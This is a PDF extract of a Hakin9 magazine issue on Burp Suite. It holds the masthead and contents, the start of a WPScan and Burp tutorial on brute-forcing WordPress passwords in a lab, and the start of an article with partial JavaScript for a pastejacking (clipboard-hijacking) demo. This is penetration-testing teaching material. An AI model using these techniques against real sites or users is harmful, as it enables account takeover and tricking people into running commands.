TEAM Proofreaders
&
Editor-in-Chief
Betatesters:
Joanna Kretowicz
[email protected]
Lee McKenzie
Editors:
Marta Sienicka
Avi Benchimol
[email protected] Bernhard Waldecker
Marta Strzelec
[email protected] Hammad Arshed
Anna Kondzierska
Ivan Gutierrez Agramont
[email protected] John Webb
Proofreader:
Lee McKenzie
David von Vistauxx
Senior Consultant/Publisher:
Paweł Marciniak Tom Updegrove
CEO:
K S Abhiraj
Joanna Kretowicz
[email protected] greg mckoy
Marketing Director:
Ayo Tayo balogun
Joanna Kretowicz
[email protected]
Jonus Gerrits
DTP
Marta Sienicka
Michal Jáchim
[email protected]
Mitch Impey
Cover Design
Hiep Nguyen Duc Wayne Kearns
Publisher
Robert Fling
Hakin9 Media Sp. z o.o.
02-676 Warszawa
Francesco Mura
ul. Postępu 17D
Phone: 1 917 338 3631 Paul Mellen
www.hakin9.org Matthew Sabin
All trademarks, trade names, or logos mentioned or used are the
property of their respective owners.
The techniques described in our articles may only be used in private,
local networks. The editors hold no responsibility for misuse of the
presented techniques or consequent data loss.
Dear Readers!
We would like to present you our newest issue, which will mainly focus on Burp
Suite. We gathered all articles we had about this tool, added new ones and pre-
pared this compendium. Tutorials, step by step guides, and more can be found
in this edition. Hamed Farid will show you how to Extend Burp with Python. Jun-
ior Carreiro wrote an article to show you how you can use Burp to perform fuzz-
ing web applications and discover SQL Injection flaws.
If you get tired of Burp, I recommend reading two amazing articles: “Demystify-
ing the Dark Web” by Sayani Banerjee and “Browser Exploits: PasteJacking And
XSSJacking” by Samrat Das. We hope that you will find many interesting articles
inside the magazine and that you will have time to read them all.
Again special thanks to the Beta testers and Proofreaders who helped with this
issue. Without your assistance there would not be a Hakin9 Magazine!
Enjoy the issue,
Hakin9 Team
What is Burp Suite?
7
by Pprasoon Nigam
Brute forcing passwords using WPScan and Burp Suite,
Kali Linux 2.0 60
by Tomasz Krupa
Extending Burp Using Python
71
by Hamed Farid
Web Application Pentesting Tools:
Burp Suite Playbook 85
by Pranav Jagtap
Harnessing the lesser known “Burp macros” for
Penetration Testing Web Apps 117
by Samrat Das
Automating Manual Security Testing Using Burp
Macros to Accelerate Manual Security testing
130
by Prashant Kumar Khare and Sarang Dabadghao
5
Burp for fuzzing
144
by Junior Carreiro
Web Applications Penetration Testing Tools -
Overview 156
by Andrea Cavallini
Demystifying the Dark Web
163
by Sayani Banerjee
Browser Exploits: PasteJacking And XSSJacking
by Samrat Das
170
6
Brute forcing passwords using WPScan and
Burp Suite, Kali Linux 2.0
by Tomasz Krupa
ABOUT THE AUTHOR
Tomasz Krupa
Security Hobbyist and Researcher, working over 9
years with Linux Debian systems, big fan of London Ar-
senal. LPIC-1 and AWS Solutions Architect Certified.
8
Brute Forcing Passwords Using WPScan And Burp Suite, Kali Linux 2.0
“Move swift as the Wind and closely-formed as the Wood. Attack like the Fire and be still as the Mountain.”
― Sun Tzu, The Art of War
In this article we will be testing web security of the popular WordPress engine by simulating a brute force attack using
my two favourite Linux Kali tools: WPScan and Burp Suite.
The Tools:
1) WPScan is a WordPress vulnerability scanner, written entirely in Ruby, capable of detecting security vulner-
abilities in websites hosted using WordPress and is pre-installed in Kali Linux.
WPScan is also capable of:
• Username enumeration
• Multi-threaded password cracking using a supplied password list
• Version enumeration
• Vulnerability enumeration
• Plugin enumeration and plugin vulnerability enumeration
• Theme enumeration
• Directory listing
2) Burp Suite is a Java based Web Penetration Testing framework and it’s a tool used by information security
professionals to identify vulnerabilities and verify attack vectors for web-based applications.
In its simplest form, Burp Suite can be classified as an “Interception Proxy”. Internet traffic is being routed through
the proxy which then acts as a sort of Man in the Middle by capturing and analysing each request and response.
Individual HTTP requests can be paused, manipulated and replayed back to the web server for targeted analysis of spe-
cific injection points, which then can be translated into automated fuzzing attacks to discover potentially unintended
application behaviours, crashes and error messages.
The Victim:
WordPress is a free and open-source content management system (CMS) based on PHP and MySQL, supporting more
than 60 million websites worldwide (according to Wikipedia).
9
Brute Forcing Passwords Using WPScan And Burp Suite, Kali Linux 2.0
As of February 2017, WordPress was used by more than 27.5% of the top 10 million websites and it’s reportedly the
most popular website management for blogging systems in the Web.
From the architecture perspective, WordPress engine is a front controller, routing all requests for non-static URIs to a
single PHP file that parses the URI and identifies the target page.
The community of users built around the product and user-friendly design resulted in a huge library of plugins and
themes (both free and paid), which can truly transform a static website into a dynamic and vibrant CMS.
Scenario:
Target:
Linux Ubuntu 14.06 running standard LAMP stack
WordPress version 4.8.2
Default security plugins
Information gathering - key points:
1) Gather as much information as possible about the application and the infrastructure it resides on.
2) When testing the application, look for any entry points where user input is accepted and dynamic content is
generated. Then, probe these areas for weaknesses in input validation, session manipulation, and authenti-
cation and information leakage.
Any information leak should be recorded and used to re-assess the overall understanding of the application and how it
works.
Note: Above command might return “Stop User enumerating plugin” (as below)- which is expected on the
latest versions of WordPress.
Pen testing WordPress engine using WPScan:
Step 1) start with updating the database on WPScan:
wpscan --update
10
! ! ! !
Browser Exploits: PasteJacking and XSSJacking
by Samrat Das
ABOUT THE AUTHOR
Samrat Das
Samrat Das is a senior security researcher currently working for Se-
cureLayer7 Technologies India. His interests revolve in Penetration
Testing, Reverse Engineering and Fuzzing. He can be reached on:
https://twitter.com/Samrat_Das93 and www.linkedin.com/in/sam18d
12
Browser Exploits: PasteJacking And XSSJacking
Hi Readers, in the field of penetration testing, we all know attacks such as Clickjacking, Cross Site Scripting. These are
attacks from most commonly included OWASP Top 10 test cases.
However, what about learning some client side exploits which can help us chain unexpected and not so commonly ac-
cepted attacks to perform account takeover, hijacking sessions, manipulating user clipboard remotely? Sounds excit-
ing? Well, that’s what XSSJacking and Paste Jacking is all out, read on to know more:
Today we will look into some advanced attack vectors which have been lately around sometime but not all are aware of
the attack.
Pastejacking. The art of changing what you copy from web pages.
What is pastejacking?
• Pastejacking is a method that malicious websites employ to take control of your computers’ clipboard and
change its content to something harmful without your knowledge.
• This feature can allow malicious websites to take over your computers’ clipboard.
• When you copy something and paste it to your clipboard, the website can run one or more commands using
your browser.
• The method can be used to change the Clipboard contents.
• If you paste something directly to the Terminals!? Result: Lethal Commands Executed
Attack scenario:
Here we have a sample page which shows a text: “who am i?” as bait for copying. Once this text is selected, it will auto-
matically get replaced in the clipboard with echo " I @// H4k3r" .
13
Browser Exploits: PasteJacking And XSSJacking
The code for pastejacking:
<html>
<body>
<h3>
<h1> <marquee> "Test PasteJacking Attack" </marquee>
<body bg color= blue
</br>
<body bgcolor="#E6E6FA">
<center>
<h4> <p>"who am i ?"</p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
var successful = document.execCommand('copy');
14